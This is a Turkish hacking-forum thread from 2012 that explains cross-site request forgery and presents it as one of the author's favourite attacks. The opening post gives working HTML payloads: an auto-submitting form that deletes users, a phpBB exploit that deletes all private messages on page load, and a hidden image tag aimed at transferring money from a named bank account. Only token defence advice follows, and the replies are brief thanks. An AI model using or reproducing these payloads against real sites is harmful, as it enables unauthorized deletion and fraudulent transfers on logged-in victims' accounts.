Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





Csrf Injection Nedir? Nasıl Yapılır?

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 17-07-2012 00:08   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2012
Mesajlar
Konular

Teşekkür (Etti): 11
Teşekkür (Aldı): 643


Post Csrf Injection Nedir? Nasıl Yapılır?



Selâmün aleyküm (السلام عليكم)
Csrf’nin açılımı Cross-site request forgery‘dir.Bu saldırı yöntemi xss’e çok benzer.Crsf ve XSRF en tehlikeli ve en sevdiğim saldırı türlerinden biridir.

Tanım olarak şöyle diyebiliriz;saldırganın site üzerinde izinsiz olarak veri yollaması değiştirmesi.Yani kullanıcının site üzerinde yapabileceği olayları dışarıdan izinsiz olarak yapmak.Kullanıcı adına mesaj yollamak,çıkış yapmak,yazı yazmak,şayet bir banka sistemiyse para transferi gibi.Crsf’nin xss’ten farkı şudur.Yapılan şeyler direk kullanıcı yetkisiyle yapılır xss’deki gibi cookie çalmaya gerek yoktur.Tabi xss’le örtüşen yanı ise bazı sistemlerde get yöntemi ile işlemler gerçekleştirildiğinden bir sayfaya gömerek kurbana yedirme gibi.

Crsf Saldırıları Nasıl Yapılır

Bu açık session sorgulaması yapmadan işlem yapan sistemlerde kullanılabilir.Bu saldırılar 2 çeşittir biri direk olarak sisteme post ile veri yollarız.
2. yol ise get ile işlemi yapılan bi olayı html kodun içine gömüp kurbana yedirerek yaparız.

İlk Yöntemdeki saldırı için örnek bir crsf exploitine bakmak isterseniz aşşağıya bakın .



PHP- Kodu:

<form name="f" action="http://www.site/delete.php" method="POST"> <input type="hidden" name="DN" value="test“> <input type="submit" name="s" class="btn" value="Tıkla Çok Accayip"> </form> <script language="javascript"> ********.forms<0>.submit() ***********

Bu exploitte virtual script sistemleri için uzaktan kullanıcı silme işlemi yapılıyor http://site/delete.php adresine bir post yollanarak.Bu açık pek çok scrippte mevcut.

Örneği:Phpbb sistemleri için pm silme exploiti asağı bak



PHP- Kodu:

<html> <head> </head> <body onLoad=javascript:********.xsrf.submit()> <form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" name="xsrf"> <input type="hidden" name="mode" value="" /> <input type="hidden" name="deleteall" value="true" /> <input type="hidden" name="confirm" value="Yes"> </body> </html>


2. yönteme gelelim .Kurban siteye giriş yapmış olması gerek. Farzedelim ki kurban sisteme giriş yapmış ve cookie zaman aşımına uğramamış yani hala işlemler gerçekleştirilebilir. Örneğin sistem bir banka olsun.Kurbana bir site yolladık ve içinde şöyle bir kod gizlemiş olalım

<img src="http://isbank.com.tr/hesapislem.php?hesap=aliosman&tutar=1220">

Bununla halkbankasından get komutuyla ali osman hesabına 1220 ytl havale etmiş oluruz. Bu kulağa hoş gelen birşey yanılıyormuyum?

Bu açık pek çok scriptte mevcut.

Bu saldırılardan nasıl korunabiliriz derseniz?

Her işleminizi yaptığınızda cookielerinizi(çerez) siliniz. Zaten sitelerde çıkış linkleri oluyor ordan yapabilirsiniz.Internet explorer kullanıyorsanız artık onu bırakın.

Firefox, Opera gibi daha güvenli tarayıcılar kullanın.

bir teşekkür yeterli olur



___________________________________________

TIKLAOsmanlı klübü Katılmak İsteyenler mesaj atabilirler.

 Offline  
 
Alıntı ile Cevapla
Teşekkür

start43 Teşekkür etti.
Alt 18-07-2012 19:26   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Mesajlar
8
Konular
0

Teşekkür (Etti): 0
Teşekkür (Aldı): 1




İlk Yöntemdeki saldırı için örnek bir crsf exploitine bakmak isterseniz aşşağıya bakın .
 Offline  
 
Alıntı ile Cevapla
Alt 28-07-2013 00:43   #3
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2013
Nereden
K.Maraş
Mesajlar
Konular

Teşekkür (Etti): 297
Teşekkür (Aldı): 515




Yararlı olmuş eline sağlık
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau